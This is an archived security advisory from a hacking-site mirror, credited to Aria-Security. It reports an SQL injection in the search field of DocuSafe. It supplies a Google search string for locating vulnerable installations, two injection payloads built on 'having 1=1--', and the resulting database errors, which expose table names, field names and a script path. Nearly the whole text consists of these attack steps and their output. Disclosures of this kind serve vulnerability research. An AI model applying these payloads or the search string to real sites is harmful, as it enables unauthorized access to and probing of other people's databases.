AOH :: HP Unsorted D :: TB13414.HTM

DocuSafe "Search" SQL Injection



DocuSafe "Search" SQL Injection
DocuSafe "Search" SQL Injection



DocuSafe "Search" SQL Injection=0D
=0D
Aria-Security Team,=0D
http://Aria-Security.net=0D 
-------------------------------=0D
Shout Outs: AurA, imm02tal=0D
Vendor: http://gartha.net=0D 
Google Search: intitle:Corporate Contact System=0D
=0D
insert your command in the section "search"=0D
example:=0D
'having 1=1--=0D
Result:=0D
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)=0D
=0D
Like ''having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.=0D
=0D
or=0D
'group by tblMain.fldArtNr having 1=1--=0D
result:=0D
=0D
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'=0D
=0D
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((tblMain.fldArtNr)=0D
=0D
Like ''group by tblMain.fldArtNr having 1=1--')) ORDER BY tblMain.fldArtNr, Max(tblMain.fldKDSrev) DESC'.=0D
=0D
/includes/common.asp, line 62=0D
=0D
=0D
Regards,=0D
The-0utl4w=0D
Credits Goes To Aria-Security.Net

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.